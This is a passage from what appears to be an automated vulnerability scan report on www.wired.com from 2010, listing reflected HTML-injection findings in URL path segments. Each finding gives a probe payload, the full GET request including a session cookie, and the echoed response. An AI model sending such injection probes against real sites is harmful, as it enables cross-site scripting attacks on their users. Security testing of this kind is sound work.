The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:03 GMT
Date: Sun, 21 Nov 2010 23:10:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news">
...[SNIP]...

1.261. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0">
...[SNIP]...

1.262. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:23 GMT
Date: Sun, 21 Nov 2010 23:09:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science58f65"><a>a1751845344 ss_discoveries c_news">
...[SNIP]...

1.263. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news">
...[SNIP]...

1.264. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:58 GMT
Date: Sun, 21 Nov 2010 23:09:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newse9994"><a>6e128528801">
...[SNIP]...

1.265. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news">
...[SNIP]...

1.266. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news">
...[SNIP]...

1.267. http://www.wired.com/science/discoveries/news/2007/12/dayintech_1217 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/12/dayintech_1217

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf">
...[SNIP]...

1.268. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:08 GMT
Date: Sun, 21 Nov 2010 23:12:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news">
...[SNIP]...

1.269. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news">
...[SNIP]...

1.270. http://www.wired.com/science/discoveries/news/2008/02/dayintech_0226 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/02/dayintech_0226

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:37 GMT
Date: Sun, 21 Nov 2010 23:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a">
...[SNIP]...

1.271. http://www.wired.com/science/discoveries/news/2008/03/dayintech_0321 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/03/dayintech_0321

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag a